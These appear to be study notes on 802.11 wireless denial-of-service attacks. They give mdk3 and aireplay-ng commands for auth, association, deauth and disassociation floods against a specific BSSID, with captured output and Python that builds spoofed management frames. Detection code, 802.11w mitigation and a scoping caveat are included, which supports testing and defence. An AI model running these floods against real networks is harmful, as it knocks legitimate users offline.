常见无线DOS攻击
記錄下自己最近一段時間對無線滲透學習的筆記。
無線DOS就是無線拒絕服務攻擊。主要包括以下幾種攻擊類型:Auth Dos攻擊、Deauth Flood攻擊、Disassociate攻擊及RF干擾攻擊等。
無線DOS工具:MDK3、Charon(MDK3圖形界面)、aireplay-ng
無線客戶端狀態:IEEE 802.11定義了一種客戶端狀態機制,用于跟蹤工作站身份驗證和關聯狀態。
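As an added example (not part of the original notes, and not code from mdk3 or aircrack-ng), the following Python models that state machine so the cost of each attack can be read off: a constructed sequence of AP-to-client frames is replayed through a station and the function reports the state it ends in and how many handshakes the client must repeat to get service back. The subtype values are the real 802.11 management subtypes; the frame sequences are constructed for illustration.

```python
"""IEEE 802.11 station state machine (illustrative model, not mdk3/aircrack-ng code).

States (802.11-2012, clause 10.3):
  1 = unauthenticated, unassociated
  2 = authenticated, unassociated
  3 = authenticated, associated  (the only state in which data frames flow)
"""
from dataclasses import dataclass, field

STATE_1, STATE_2, STATE_3 = 1, 2, 3

# Management-frame subtypes as carried in the frame-control field (type 0)
ASSOC_RESP = 0x1
DISASSOC = 0xA
AUTH = 0xB
DEAUTH = 0xC

# Frame classes: class 1 frames are valid in every state, class 2 only once
# authenticated.  A spoofed Deauthentication is therefore accepted even by a
# station the attacker has never exchanged a frame with (absent 802.11w).
FRAME_CLASS = {AUTH: 1, DEAUTH: 1, ASSOC_RESP: 2, DISASSOC: 2}


@dataclass
class Station:
    state: int = STATE_1
    log: list = field(default_factory=list)

    def receive(self, subtype: int, status: int = 0) -> int:
        """Apply one frame the station receives from (what it believes is) its AP."""
        if FRAME_CLASS[subtype] == 2 and self.state == STATE_1:
            # Class 2 frame while unauthenticated: the state machine ignores it
            self.log.append((subtype, self.state, "ignored"))
            return self.state
        if subtype == AUTH and status == 0 and self.state == STATE_1:
            self.state = STATE_2            # successful Authentication response
        elif subtype == ASSOC_RESP and status == 0 and self.state == STATE_2:
            self.state = STATE_3            # successful Association response
        elif subtype == DEAUTH:
            self.state = STATE_1            # Deauth: lose authentication AND association
        elif subtype == DISASSOC:
            self.state = STATE_2            # Disassoc: keep authentication, lose association
        self.log.append((subtype, self.state, "applied"))
        return self.state


def handshakes_to_recover(state: int) -> int:
    """Exchanges (auth, assoc) the client must redo to return to state 3."""
    return {STATE_1: 2, STATE_2: 1, STATE_3: 0}[state]


def attack_cost(frames):
    """Replay a constructed AP->client frame sequence.
    Returns (final_state, handshakes the client needs to regain service)."""
    sta = Station()
    for subtype in frames:
        sta.receive(subtype)
    return sta.state, handshakes_to_recover(sta.state)


if __name__ == "__main__":
    join = [AUTH, ASSOC_RESP]
    print("normal join         ->", attack_cost(join))
    print("then deauth         ->", attack_cost(join + [DEAUTH]))
    print("then disassoc       ->", attack_cost(join + [DISASSOC]))
    print("deauth, never joined->", attack_cost([DEAUTH]))
```

A deauthenticated client has to redo both exchanges, a disassociated one only the association; either way the client comes back by itself, which is why the floods in the following sections have to be sustained rather than sent once.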
I. Auth Flood attack
Auth Flood (authentication flood): the attacker sends the target AP a stream of forged Authentication request frames, each with a different spoofed source MAC. The AP allocates a state-table entry for every station that authenticates, so once the table (or the AP's CPU) is exhausted it starts dropping or refusing legitimate clients, and some models reset. The damage lands on the genuine clients that were authenticated and associated with the AP, but what is being attacked is the AP's state table. The attack works because 802.11 Authentication frames carry no integrity protection: even on a WPA2 network the initial Open System authentication is unauthenticated, and only the later 4-way handshake is cryptographically protected.
Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment and note the target BSSID and channel (wlan0mon is the monitor-mode interface created by airmon-ng start wlan0).
2. mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s <pps>]
where:
a: authentication DoS mode
-a: attack only the specified AP, given as the AP's BSSID (MAC address); without it mdk3 floods every AP in range
-s: send rate in packets per second (default: unlimited)
-m: (optional) use client MACs with valid vendor OUIs instead of fully random ones, so the fake clients look like real hardware
Once the attack takes effect, the target AP lists a large number of non-existent stations as connected to it.
1. airodump-ng wlan0mon window
Output:
CH  9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 D8:15:0D:2D:CB:58  -31      112      163    0  11  54e. WPA2 CCMP   PSK  2DCB58

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 D8:15:0D:2D:CB:58  F8:F2:BC:C6:51:5D    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  F3:40:CE:5E:A1:8A    0    0 - 0     0       1
 D8:15:0D:2D:CB:58  BC:1A:0E:BD:3F:D1    0    0 - 0     0       1
 D8:15:0D:2D:CB:58  32:5B:DC:7C:DE:9F    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  A7:31:EC:CF:2B:5C    0    0 - 0     0       1
 D8:15:0D:2D:CB:58  AA:87:1B:45:07:C5    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  16:EF:9B:80:A9:63    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  AE:C1:8E:C0:B6:26    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  84:3C:B5:5D:E1:00    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  C9:80:8B:1A:8F:7E    0    0 - 1     0       1
 D8:15:0D:2D:CB:58  D9:A3:50:0F:F2:40    0    0 - 0     0       1
 D8:15:0D:2D:CB:58  79:C5:24:71:A8:5E    0    0 - 0     0       1
 D8:15:0D:2D:CB:58  20:EB:6C:93:84:56    0    0 - 1     0       1
Every station row shows PWR 0 and a single frame: these are mdk3's fabricated clients (one random MAC and one Authentication frame each), not real radios, and that pattern is itself a usable detection signature.
2. mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 window:
Device is still responding with 304500 clients connected!
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
Device is still responding with 305000 clients connected!
Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
Device is still responding with 305500 clients connected!
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
Device is still responding with 306000 clients connected!
Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
Device is still responding with 306500 clients connected!
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
Device is still responding with 307000 clients connected!
Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
Device is still responding with 307500 clients connected!
AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE!
mdk3 periodically checks whether the AP still answers. "seems to be INVULNERABLE" means that after more than 300,000 fake clients this AP was still responding: its state table did not overflow and it did not reset. The flood did load the AP (the fake stations appear in airodump-ng), but against this model it did not produce a full denial of service.
3. Capture packets and inspect the wireless traffic (in Wireshark on wlan0mon, Authentication frames match the filter wlan.fc.type_subtype == 0x0b).
II. Deauth Flood attack
Deauth Flood (deauthentication flood) spoofs Deauthentication frames that appear to come from the AP and are addressed to a client's unicast address (or to the broadcast address, which hits every client at once), forcing the client back into the unauthenticated/unassociated state (state 1). With current tools this is the fastest and most reliable way to cut a client's wireless service. The client normally re-authenticates and re-associates to regain service until the next spoofed frame arrives, so the attacker has to keep sending Deauthentication frames to hold all clients offline. Caveat: if the AP and its clients use 802.11w Protected Management Frames (optional in WPA2, mandatory in WPA3), Deauthentication and Disassociation frames are integrity-protected and spoofed ones are discarded, which defeats this attack (though not RF jamming).
Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment.
2. mdk3 wlan0mon d -c 1[,6,11] [-w file1 | -b file2]; the same attack can be run with aireplay-ng -0 0 -a <AP BSSID> [-c <client MAC>] wlan0mon (-0 0 sends deauthentication frames without limit, -a selects the AP, -c restricts the frames to one client instead of broadcast)
where:
d: deauthentication/disassociation attack mode (mdk3 sends both frame types)
-c: channel(s) to work on; the example command says 1, the run below used channel 11
-w file: whitelist mode, the file lists MACs (APs or clients) that are left alone
-b file: blacklist mode, the file lists the MACs to attack; without -b mdk3 attacks every AP and client it sees on the channel
After the attack takes effect, the clients of the APs on that channel are disconnected.
1. airodump-ng wlan0mon window, output:
CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 D8:15:0D:2D:CB:58  -63      683     1186    0  11  54e. WPA2 CCMP   PSK  2DCB58

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 D8:15:0D:2D:CB:58  FF:FF:FF:FF:FF:FF    0    0 - 0     0       8
 D8:15:0D:2D:CB:58  20:82:C0:A9:E2:A6    0    1e- 0     0     147
 D8:15:0D:2D:CB:58  5C:E0:C5:1A:17:C9  -52    0 - 1e    0      33
 D8:15:0D:2D:CB:58  00:5A:13:2F:04:A0  -42    0e- 1e    0    1644
The "station" FF:FF:FF:FF:FF:FF is the broadcast address: airodump-ng lists it because it saw the broadcast Deauthentication frames mdk3 sent under this BSSID. A broadcast address showing up in the station list is itself a sign of a deauth attack.
2. mdk3 wlan0mon d -c 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58
Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11
Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11
Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11
Note that without -b the run is not scoped to the target: mdk3 also sent broadcast deauthentications for a second AP, E4:F3:F5:00:0C:A0, that happened to be on channel 11. On an authorized test, put the target BSSID in a file and pass it with -b so neighbouring networks are not hit.
3. Capture packets and inspect the wireless traffic (Deauthentication frames match wlan.fc.type_subtype == 0x0c in Wireshark).
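To make concrete what mdk3 a and mdk3 d / aireplay-ng -0 actually put on the air in sections I and II, here is an added Python example (not code from mdk3 or aircrack-ng) that builds the raw 802.11 Authentication, Deauthentication and Disassociation frames and parses them back. The BSSID D8:15:0D:2D:CB:58 is reused from the captures above; the reason codes and the random client MACs are assumptions. The builders return the bare MAC frame (no radiotap header, no FCS), so the bytes are for inspection rather than injection.

```python
"""Builders and a parser for the unprotected 802.11 management frames behind the
Auth and Deauth floods (added example, not mdk3/aireplay-ng code).  Frames are
the 24-byte MAC header plus body; the driver adds radiotap and FCS on the air."""
import os
import struct

MGMT_AUTH, MGMT_DISASSOC, MGMT_DEAUTH = 0xB, 0xA, 0xC
BROADCAST = "FF:FF:FF:FF:FF:FF"
# Reason 7 = "class 3 frame received from non-associated STA", the value most
# deauth tools send; used as the default here by assumption.
REASON_DEFAULT = 7


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def random_client_mac() -> str:
    """Random locally-administered unicast MAC, one per fake client as mdk3 'a' does."""
    b = bytearray(os.urandom(6))
    b[0] = (b[0] & 0xFE) | 0x02   # clear the multicast bit, set locally-administered
    return mac_str(bytes(b))


def mgmt_header(subtype: int, addr1: str, addr2: str, addr3: str, seq: int = 0) -> bytes:
    # Frame control: version 0, type 0 (management), subtype in bits 4-7, no flags
    fc = subtype << 4
    return (struct.pack("<HH", fc, 0)                     # frame control, duration
            + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3)
            + struct.pack("<H", (seq & 0xFFF) << 4))      # sequence control, fragment 0


def auth_request(bssid: str, client: str, seq: int = 0) -> bytes:
    """Open System authentication request: algorithm 0, sequence 1, status 0.
    addr1 = AP, addr2 = (spoofed) client, addr3 = BSSID.  Nothing in it is signed."""
    return mgmt_header(MGMT_AUTH, bssid, client, bssid, seq) + struct.pack("<HHH", 0, 1, 0)


def deauth(bssid: str, client: str = BROADCAST, reason: int = REASON_DEFAULT, seq: int = 0) -> bytes:
    """Deauthentication apparently sent by the AP to one client or to broadcast."""
    return mgmt_header(MGMT_DEAUTH, client, bssid, bssid, seq) + struct.pack("<H", reason)


def disassoc(bssid: str, client: str = BROADCAST, reason: int = 8, seq: int = 0) -> bytes:
    """Disassociation apparently sent by the AP (reason 8 = STA is leaving the BSS)."""
    return mgmt_header(MGMT_DISASSOC, client, bssid, bssid, seq) + struct.pack("<H", reason)


def auth_flood_batch(bssid: str, count: int) -> list:
    """One burst of 'mdk3 <iface> a -a <bssid>': count requests, each from a new fake client."""
    return [auth_request(bssid, random_client_mac(), seq=i) for i in range(count)]


def parse_mgmt(frame: bytes) -> dict:
    """Decode the header and body of an Auth/Deauth/Disassoc frame."""
    fc, = struct.unpack_from("<H", frame, 0)
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "protected": bool(fc & 0x4000),   # set on unicast deauth/disassoc under 802.11w
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
    }
    body = frame[24:]
    if info["subtype"] == MGMT_AUTH:
        info["alg"], info["auth_seq"], info["status"] = struct.unpack_from("<HHH", body)
    elif info["subtype"] in (MGMT_DEAUTH, MGMT_DISASSOC):
        info["reason"], = struct.unpack_from("<H", body)
    return info


if __name__ == "__main__":
    ap = "D8:15:0D:2D:CB:58"
    print(parse_mgmt(auth_request(ap, random_client_mac())))
    print(parse_mgmt(deauth(ap)))
    print(len(auth_flood_batch(ap, 1000)), "auth frames, all from different fake clients")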
III. Association Flood attack
Association Flood (association flood): a wireless router or access point keeps a connection-state table (the association table) listing every client associated with it. The attack fills that table with a large number of spoofed client associations so that the AP is swamped and has no room left for real clients.
Because Open System authentication (null authentication) lets any client authenticate and then associate, an attacker can impersonate many clients by completing the authentication and association exchange from many spoofed MAC addresses, until the target AP's association table is full. As with the Auth flood, a WPA2 AP is not protected here: association happens before the 4-way handshake that actually proves knowledge of the password.
Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment.
2. mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s <pps>]
where:
a: authentication DoS mode (mdk3 has no separate association-flood mode; its -i <ap_mac> "intelligent test" variant is the one that fully connects fake clients to the AP and keeps them alive by re-injecting sniffed data)
-a: attack only the specified AP, given as its BSSID
-s: send rate in packets per second
Once the attack takes effect, the target AP lists a large number of non-existent stations as connected to it.
1. airodump-ng wlan0mon window and 2. mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 window: the same run and output as shown under the Auth Flood attack in section I.
3. Capture packets and inspect the wireless traffic (Association Request frames match wlan.fc.type_subtype == 0x00 in Wireshark).
A second variant uses hardware rather than spoofing: the attacker gathers a large number of wireless cards, or a modified bundled transmitter built from many wireless chipsets (comparable to the "bulk SMS sender" boxes), and performs a mass connection attack with real radios. Against the access points in common use today this is also very effective.
IV. Disassociation Flood attack
Disassociation Flood behaves much like the Deauthentication flood. It spoofs Disassociation frames from the AP to a client, forcing the client into the authenticated-but-unassociated state (state 2), so the client only has to re-associate, not re-authenticate, to regain service. As with deauth, the client recovers by itself until the next spoofed frame arrives, so the attacker must keep sending Disassociation frames to keep it off the network; 802.11w protects these frames as well.
A Disassociation Broadcast attack follows the same principle as the Disassociation flood and differs only in scale and tooling: the broadcast form is often used to support a wireless man-in-the-middle attack (knocking clients off so they reconnect to an attacker-controlled AP), while the flood is usually a targeted point-to-point DoS, for example against a specific organization's or department's access points.
Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment.
2. mdk3 wlan0mon d -c 1[,6,11] [-w file1 | -b file2]
where:
d: deauthentication/disassociation attack mode
-c: channel(s) to work on, 1 in this example command (the run below used 11)
-w file: whitelist mode, the file lists MACs that are left alone
-b file: blacklist mode, the file lists the target MACs to attack
After the attack takes effect, the clients of the APs on that channel are disconnected.
1. airodump-ng wlan0mon window and 2. mdk3 wlan0mon d -c 11 window: the same run and output as shown under the Deauth Flood attack in section II (mdk3's d mode sends both Deauthentication and Disassociation frames, so one run covers both sections).
3. Capture packets and inspect the wireless traffic (Disassociation frames match wlan.fc.type_subtype == 0x0a in Wireshark; the broadcast ones have wlan.da == ff:ff:ff:ff:ff:ff).
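The same management-frame floods are straightforward to detect on the defender's side. This added Python example (not from the original notes or from any WIDS product) runs a per-BSSID, per-second rate check over a constructed frame log shaped like the runs in sections I, II and IV: many distinct sources authenticating or associating to one AP flags an Auth/Association flood, many Deauthentication/Disassociation frames "from" one AP, or any broadcast one, flags a Deauth/Disassoc flood. The thresholds, the sample frames and the client MAC 02:00:00:00:00:xx pattern are assumptions.

```python
"""Management-frame flood detector over a constructed frame log (added example).
Input rows are (timestamp, subtype, addr1, addr2, addr3) as a capture tool
decodes them.  For a frame sent by a client addr1 is the AP and addr2 the
client; for a frame sent by the AP addr1 is the client (or broadcast) and
addr2 the AP; addr3 is the BSSID either way."""
from collections import defaultdict

ASSOC_REQ, DISASSOC, AUTH, DEAUTH = 0x0, 0xA, 0xB, 0xC
BROADCAST = "FF:FF:FF:FF:FF:FF"

# Per-BSSID, per-second thresholds.  Assumed values for illustration; a real
# deployment tunes them to the site's normal join and roaming rates.
AUTH_DISTINCT_SRC_THRESHOLD = 20   # distinct client MACs authenticating/associating to one AP
KICK_FRAMES_THRESHOLD = 10         # Deauth + Disassoc frames "from" one AP


def detect_floods(frames):
    """Return sorted (second, bssid, alert) tuples for every 1-second bucket that trips a rule."""
    auth_sources = defaultdict(set)   # (sec, bssid) -> client MACs seen in Auth/AssocReq
    kicks = defaultdict(int)          # (sec, bssid) -> Deauth/Disassoc count
    broadcast_kick = set()            # (sec, bssid) that carried a broadcast Deauth/Disassoc
    for ts, subtype, addr1, addr2, addr3 in frames:
        key = (int(ts), addr3)
        if subtype in (AUTH, ASSOC_REQ):
            auth_sources[key].add(addr2)
        elif subtype in (DEAUTH, DISASSOC):
            kicks[key] += 1
            if addr1 == BROADCAST:
                broadcast_kick.add(key)
    alerts = set()
    for (sec, bssid), sources in auth_sources.items():
        if len(sources) >= AUTH_DISTINCT_SRC_THRESHOLD:
            alerts.add((sec, bssid, "auth/assoc flood"))
    for (sec, bssid), count in kicks.items():
        # A real AP rarely kicks more than a few clients per second and almost
        # never sends a broadcast deauth outside of a reboot.
        if count >= KICK_FRAMES_THRESHOLD or (sec, bssid) in broadcast_kick:
            alerts.add((sec, bssid, "deauth/disassoc flood"))
    return sorted(alerts)


AP = "D8:15:0D:2D:CB:58"          # BSSID from the captures above
CLIENT = "00:5A:13:2F:04:A0"      # the real client seen in the deauth run


def sample_capture():
    """Constructed frame log mimicking three phases: a normal join, an mdk3 'a'
    burst, then an mdk3 'd' burst.  Not a real capture."""
    frames = []
    # second 0: one real client joining
    frames.append((0.10, AUTH, AP, CLIENT, AP))
    frames.append((0.20, ASSOC_REQ, AP, CLIENT, AP))
    # second 1: auth flood, 40 fake clients with distinct spoofed MACs
    for i in range(40):
        frames.append((1.0 + i / 100, AUTH, AP, f"02:00:00:00:00:{i:02X}", AP))
    # second 2: broadcast and unicast Deauthentications "from" the AP
    for i in range(5):
        frames.append((2.00 + i / 10, DEAUTH, BROADCAST, AP, AP))
        frames.append((2.05 + i / 10, DEAUTH, CLIENT, AP, AP))
    return frames


if __name__ == "__main__":
    for alert in detect_floods(sample_capture()):
        print(alert)
```

The second-0 bucket produces nothing, the auth burst trips the distinct-source rule and the deauth burst trips both the count and the broadcast rule. Feeding the detector from a live monitor-mode capture only requires mapping each decoded frame to the same five-tuple.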
V. RF Jamming attack
RF Jamming transmits interfering radio energy on the channel so that normal wireless communication breaks down. The attacks above exploit the 802.11 communication process and protocol; this one is purely physical and involves no 802.11 frames at all, so protocol-level defences such as 802.11w do not help. It is detected by watching the noise floor or spectrum rather than frames, and stopped only by locating and removing the transmitter. RF stands for radio frequency, here meaning the wireless signal transmitters and receivers.
Because of environment limitations I have no test equipment at hand, so I cannot show the actual packets here; I will cover this separately when I get the chance.
Summary